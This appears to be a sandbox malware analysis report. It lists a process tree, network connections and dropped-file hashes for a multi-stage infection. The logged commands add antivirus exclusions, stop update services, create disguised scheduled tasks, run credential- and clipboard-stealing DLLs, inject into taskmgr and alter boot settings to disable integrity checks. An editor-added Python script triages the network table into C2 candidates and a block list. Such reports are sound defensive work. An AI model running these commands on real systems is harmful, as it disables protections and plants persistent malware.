C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1540 -s 748

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "tmbTrGgEESOC6ai2Qp4cdXBg.exe" /f & erase "C:\Users\Admin\Pictures\tmbTrGgEESOC6ai2Qp4cdXBg.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "tmbTrGgEESOC6ai2Qp4cdXBg.exe" /f

C:\Windows\syswow64\rundll32.exe

"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61 C:\Users\Admin\AppData\Local\Temp\2389231104.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "s6.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "s6.exe" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | pastebin.com | udp
US | 8.8.8.8:53 | yip.su | udp
US | 104.20.68.143:443 | pastebin.com | tcp
DE | 148.251.234.93:443 | yip.su | tcp
US | 8.8.8.8:53 | flyawayaero.net | udp
RU | 5.42.64.10:80 | 5.42.64.10 | tcp
US | 8.8.8.8:53 | downloads.digitalpulsedata.com | udp
US | 85.217.144.143:80 | 85.217.144.143 | tcp
US | 8.8.8.8:53 | ji.fhauiehgha.com | udp
US | 8.8.8.8:53 | lycheepanel.info | udp
US | 8.8.8.8:53 | jetpackdelivery.net | udp
US | 8.8.8.8:53 | bolidare.beget.tech | udp
US | 8.8.8.8:53 | goboh2b.top | udp
US | 8.8.8.8:53 | net.geo.opera.com | udp
US | 85.217.144.143:80 | 85.217.144.143 | tcp
US | 8.8.8.8:53 | link.storjshare.io | udp
US | 104.21.93.225:443 | flyawayaero.net | tcp
RU | 91.106.207.50:80 | bolidare.beget.tech | tcp
RU | 45.8.228.16:80 | goboh2b.top | tcp
US | 188.114.96.0:443 | jetpackdelivery.net | tcp
NL | 13.227.219.25:443 | downloads.digitalpulsedata.com | tcp
US | 104.21.32.208:443 | lycheepanel.info | tcp
NL | 185.26.182.111:80 | net.geo.opera.com | tcp
US | 136.0.77.2:443 | link.storjshare.io | tcp
NL | 185.26.182.111:443 | net.geo.opera.com | tcp
HK | 103.100.211.218:80 | ji.fhauiehgha.com | tcp
US | 8.8.8.8:53 | potatogoose.com | udp
US | 8.8.8.8:53 | apps.identrust.com | udp
US | 8.8.8.8:53 | apps.identrust.com | udp
US | 172.67.180.173:443 | potatogoose.com | tcp
NL | 88.221.25.169:80 | apps.identrust.com | tcp
NL | 88.221.25.153:80 | apps.identrust.com | tcp
US | 8.8.8.8:53 | justsafepay.com | udp
US | 188.114.97.0:443 | justsafepay.com | tcp
US | 8.8.8.8:53 | z.nnnaajjjgc.com | udp
MU | 156.236.72.121:443 | z.nnnaajjjgc.com | tcp
US | 136.0.77.2:80 | link.storjshare.io | tcp
BG | 193.42.32.29:80 | 193.42.32.29 | tcp
BG | 193.42.32.29:80 | 193.42.32.29 | tcp
US | 8.8.8.8:53 | demo.seafile.com | udp
RU | 5.42.64.10:80 | 5.42.64.10 | tcp
DE | 168.119.152.22:80 | demo.seafile.com | tcp
DE | 168.119.152.22:443 | demo.seafile.com | tcp
US | 8.8.8.8:53 | m7val1dat0r.info | udp
US | 172.67.222.167:443 | m7val1dat0r.info | tcp
US | 8.8.8.8:53 | app.nnnaajjjgc.com | udp
HK | 154.221.26.108:80 | app.nnnaajjjgc.com | tcp
US | 8.8.8.8:53 | connectini.net | udp
GB | 91.109.116.11:443 | connectini.net | tcp
US | 8.8.8.8:53 | wewewe.s3.eu-central-1.amazonaws.com | udp
US | 8.8.8.8:53 | vibrator.s3.pl-waw.scw.cloud | udp
US | 8.8.8.8:53 | link.storjshare.io | udp
US | 8.8.8.8:53 | link.storjshare.io | udp
DE | 3.5.136.126:443 | wewewe.s3.eu-central-1.amazonaws.com | tcp
US | 136.0.77.2:443 | link.storjshare.io | tcp
PL | 151.115.10.1:443 | vibrator.s3.pl-waw.scw.cloud | tcp
US | 136.0.77.2:443 | link.storjshare.io | tcp
US | 8.8.8.8:53 | 360devtracking.com | udp
GB | 91.109.116.11:80 | 360devtracking.com | tcp
US | 8.8.8.8:53 | iplogger.com | udp
DE | 148.251.234.93:443 | iplogger.com | tcp
RU | 5.42.64.10:80 | 5.42.64.10 | tcp
RU | 5.42.64.10:80 | 5.42.64.10 | tcp
RU | 5.42.64.10:80 |  | tcp
RU | 5.42.64.10:80 | 5.42.64.10 | tcp
US | 8.8.8.8:53 | script.google.com | udp
US | 8.8.8.8:53 | mediasitenews.com | udp
DE | 148.251.234.93:443 | iplogger.com | tcp
DE | 148.251.234.93:443 | iplogger.com | tcp
DE | 148.251.234.93:443 | iplogger.com | tcp
DE | 148.251.234.93:443 | iplogger.com | tcp
US | 194.87.32.213:443 | mediasitenews.com | tcp
DE | 148.251.234.93:443 | iplogger.com | tcp
DE | 148.251.234.93:443 | iplogger.com | tcp
DE | 148.251.234.93:443 | iplogger.com | tcp
DE | 148.251.234.93:443 | iplogger.com | tcp
US | 194.87.32.213:443 | mediasitenews.com | tcp
US | 8.8.8.8:53 | script.google.com | udp
DE | 172.217.23.206:80 | script.google.com | tcp
DE | 172.217.23.206:443 | script.google.com | tcp
US | 8.8.8.8:53 | t.me | udp
NL | 149.154.167.99:443 | t.me | tcp
NL | 149.154.167.99:443 | t.me | tcp
NL | 149.154.167.99:443 | t.me | tcp
NL | 149.154.167.99:443 | t.me | tcp
US | 8.8.8.8:53 | steamcommunity.com | udp
JP | 23.207.106.113:443 | steamcommunity.com | tcp
US | 8.8.8.8:53 | script.googleusercontent.com | udp
NL 142.251.36.1:443 script.googleusercontent.com tcp
DE 116.203.7.13:80 116.203.7.13 tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 173.214.169.17:443 tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 8.8.8.8:53 51df8fab-95bc-4aa8-a109-c86e3d5827bb.uuid.ramboclub.net udp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 stun1.l.google.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 server3.ramboclub.net udp
US 142.251.125.127:19302 stun1.l.google.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
BG 185.82.216.48:443 server3.ramboclub.net tcp
US 8.8.8.8:53 mastertryprice.com udp
US 172.67.212.103:443 mastertryprice.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
BG 185.82.216.48:443 server3.ramboclub.net tcp
BG 193.42.32.29:80 193.42.32.29 tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
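The table above mixes DNS lookups through 8.8.8.8, repeated connections to the same endpoint, public services used as dead drops or hosting (pastebin.com, t.me, steamcommunity.com, script.google.com, cdn.discordapp.com, Storj and S3 links, iplogger.com, Google STUN) and a Monero pool on a non-standard port (xmr.2miners.com:12222). The script below is an added triage example written for this page, not part of the sandbox report: it parses rows in the report's own "CC ip:port [domain] proto" layout, separates lookups from connections, counts repeat connections per endpoint and sorts them into categories. The allow-list of abused-but-legitimate services and the "80/443 are standard" heuristic are the editor's assumptions; the embedded rows are a constructed excerpt of the table, including the two rows whose Domain column is empty.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Constructed excerpt: a dozen rows copied from the Network table above, including the
# two rows whose Domain column is empty. It is not the full table.
SAMPLE_ROWS = """\
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
RU 5.42.64.10:80 5.42.64.10 tcp
RU 5.42.64.10:80 tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
DE 162.19.139.184:12222 xmr.2miners.com tcp
NL 149.154.167.99:443 t.me tcp
US 142.251.125.127:19302 stun1.l.google.com udp
US 173.214.169.17:443 tcp
DE 148.251.234.93:443 iplogger.com tcp
"""

# Row layout: "<CC> <ip>:<port> [<domain>] <proto>"; the domain column may be absent.
ROW_RE = re.compile(
    r"^(?P<cc>[A-Z]{2})\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)\s+"
    r"(?:(?P<domain>\S+)\s+)?(?P<proto>tcp|udp)$"
)

# Assumption (editor's allow-list, not something the report states): services that are
# legitimate in themselves but appear here as dead-drop resolvers, payload hosting,
# victim counters or external-IP discovery. They explain behaviour; blocking them
# wholesale is rarely acceptable.
ABUSED_LEGIT = {
    "pastebin.com", "t.me", "steamcommunity.com", "script.google.com",
    "cdn.discordapp.com", "link.storjshare.io", "iplogger.com", "stun1.l.google.com",
}
STANDARD_PORTS = {80, 443}


@dataclass(frozen=True)
class Conn:
    cc: str
    ip: str
    port: int
    domain: Optional[str]   # None when the column is empty or merely repeats the IP
    proto: str


def parse_rows(text: str) -> list:
    conns = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if not m:
            raise ValueError(f"unparseable row: {line!r}")
        domain = m["domain"]
        if domain == m["ip"]:
            domain = None
        conns.append(Conn(m["cc"], m["ip"], int(m["port"]), domain, m["proto"]))
    return conns


def is_dns_lookup(c: Conn) -> bool:
    return c.proto == "udp" and c.port == 53


def triage(conns):
    """Split the table into resolved names and real connections, count repeat
    connections per endpoint (beacon-like behaviour) and attach a category."""
    lookups = sorted({c.domain for c in conns if is_dns_lookup(c) and c.domain})
    counts = Counter((c.ip, c.port, c.domain) for c in conns if not is_dns_lookup(c))
    findings = {}
    for (ip, port, domain), n in counts.items():
        if domain in ABUSED_LEGIT:
            cat = "abused legitimate service"
        elif port not in STANDARD_PORTS:
            cat = "non-standard port"       # e.g. xmr.2miners.com:12222 in this report
        elif domain is None:
            cat = "direct-to-IP"
        else:
            cat = "candidate C2"
        findings[(ip, port, domain)] = (cat, n)
    return lookups, findings


def block_list(findings) -> set:
    """Indicators worth a block rule: everything except the abused public services."""
    return {domain or ip for (ip, port, domain), (cat, _) in findings.items()
            if cat != "abused legitimate service"}


if __name__ == "__main__":
    lookups, findings = triage(parse_rows(SAMPLE_ROWS))
    print("resolved:", lookups)
    for key, (cat, n) in sorted(findings.items(), key=lambda kv: -kv[1][1]):
        print(f"{n:3d}x {key[0]}:{key[1]} {key[2] or '-':30} {cat}")
    print("block:", sorted(block_list(findings)))
```

Run against the full table, the repeat count is what separates the real beacon (mediasitenews.com, dozens of connections) from one-off downloads, and the category keeps the dead-drop hosts out of the block list while still recording them as behavioural context.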

Files

memory/2076-0-0x000000013FD90000-0x000000014016E000-memory.dmp

memory/2020-5-0x000000001B340000-0x000000001B622000-memory.dmp

memory/2020-6-0x00000000022A0000-0x00000000022A8000-memory.dmp

memory/2020-7-0x000007FEF4630000-0x000007FEF4FCD000-memory.dmp

memory/2020-8-0x00000000026E0000-0x0000000002760000-memory.dmp

memory/2020-9-0x00000000026E0000-0x0000000002760000-memory.dmp

memory/2020-10-0x000007FEF4630000-0x000007FEF4FCD000-memory.dmp

memory/2020-11-0x00000000026E0000-0x0000000002760000-memory.dmp

memory/2020-12-0x00000000026E0000-0x0000000002760000-memory.dmp

memory/2076-16-0x00000000770E0000-0x0000000077289000-memory.dmp

memory/2668-17-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2668-19-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2020-15-0x000007FEF4630000-0x000007FEF4FCD000-memory.dmp

memory/2076-14-0x000000013FD90000-0x000000014016E000-memory.dmp

memory/2668-13-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2668-20-0x0000000073F20000-0x000000007460E000-memory.dmp

memory/2668-21-0x0000000004B00000-0x0000000004B40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab4AC8.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\Local\Temp\Tar4AFA.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7cd91e043dcb09c5d65149f7adc36b17
SHA1 b9500ab33b6f7e4c8d62f2f621c896d91f78dcb6
SHA256 7108976ae2319ed56d149d8529a623209d1c8aa1d3be78b04ac7f9525cb7c6db
SHA512 b060701b0f41bbba3b980c35b014b2b27f381758b6d0cd6982615ee4d34a5b17646a9f451e6b6b9f67a8b2bd7d11dcf05e5af47a144cc5a78656a183626c788d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A

MD5 f624be06efb00e72682fe932c0b4789b
SHA1 43c854836bd9565ca08f6b9c47a732b3df791c47
SHA256 1460d3580d23cca19c24be22999947c2d14c3c906a8cfc497c31607d33c0ae99
SHA512 9c7cb27e0cf244a3f16f098a758404df04e6fd2cf14c16035dd88d3c7e77cdd8bdc21b061dff6cc8a64a8be81f2fefaee2e3d949967d6e0a82a60aaa71ae658c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

MD5 d4ae187b4574036c2d76b6df8a8c1a30
SHA1 b06f409fa14bab33cbaf4a37811b8740b624d9e5
SHA256 a2ce3a0fa7d2a833d1801e01ec48e35b70d84f3467cc9f8fab370386e13879c7
SHA512 1f44a360e8bb8ada22bc5bfe001f1babb4e72005a46bc2a94c33c4bd149ff256cce6f35d65ca4f7fc2a5b9e15494155449830d2809c8cf218d0b9196ec646b0c

\Users\Admin\Pictures\wPMt0uRRbpirsjnCi7YBvIL0.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\wPMt0uRRbpirsjnCi7YBvIL0.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4859ce93eb80c478a6530c2e5dbbf796
SHA1 3c5cb939df078789437c8337cd01c0921f425573
SHA256 052352770d6dc745c2ecbe2aaa6a7c791168ec956dc682a4768725c7b3b62eec
SHA512 62ff4b7386426124f3b9ae507566b2dedefcffe4604b10c3de536fd2aeecd8689ed9019eb7e1e943fc59673bc15cd5f3af74259e9e1990e1ca5972f3cbf59f09

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c9b3af025f3b2782c8fa3f7dc41a1fc4
SHA1 66d6070e7064ed56ff87b15e4b1758f174cb92ce
SHA256 d4ac127f13b49638c06876f9ddf618713740000d14de2043b7ebe6485a834dd6
SHA512 4ef0d6ecdb5793db25553720f0f5614632149c111b339037284556f1c6b60a32addb69c26550e04feb5c598997b25b859edd9ab8ef5f10b63239fc5ef85b9f7a

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\tmbTrGgEESOC6ai2Qp4cdXBg.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

\Users\Admin\Pictures\tmbTrGgEESOC6ai2Qp4cdXBg.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

\Users\Admin\Pictures\iyLl1NDgn29kmwOyBmeudOST.exe

MD5 9110c26b4e982d541e19db0d4dd07ac4
SHA1 712dfa47ee8c828f01efa976de006679df20dde4
SHA256 960fb23ba0b64e081c49e12ea5062d95f15b1d1ccb63e743dac5ead8d2defa58
SHA512 a9f1acc4b5d90d01c45761ccf22945c4cef50c132d59db48b85f03eaebd27939550677333869c89dfbe09236dcb0db0c824fce1a37da4c394a9871155795a378

C:\Users\Admin\Pictures\iyLl1NDgn29kmwOyBmeudOST.exe

MD5 9110c26b4e982d541e19db0d4dd07ac4
SHA1 712dfa47ee8c828f01efa976de006679df20dde4
SHA256 960fb23ba0b64e081c49e12ea5062d95f15b1d1ccb63e743dac5ead8d2defa58
SHA512 a9f1acc4b5d90d01c45761ccf22945c4cef50c132d59db48b85f03eaebd27939550677333869c89dfbe09236dcb0db0c824fce1a37da4c394a9871155795a378

\Users\Admin\Pictures\5zGyTtOhCdrE154HEkNl5ci5.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\Pictures\5zGyTtOhCdrE154HEkNl5ci5.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\Pictures\iyLl1NDgn29kmwOyBmeudOST.exe

MD5 9110c26b4e982d541e19db0d4dd07ac4
SHA1 712dfa47ee8c828f01efa976de006679df20dde4
SHA256 960fb23ba0b64e081c49e12ea5062d95f15b1d1ccb63e743dac5ead8d2defa58
SHA512 a9f1acc4b5d90d01c45761ccf22945c4cef50c132d59db48b85f03eaebd27939550677333869c89dfbe09236dcb0db0c824fce1a37da4c394a9871155795a378

\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

memory/2308-256-0x0000000002670000-0x0000000002A68000-memory.dmp

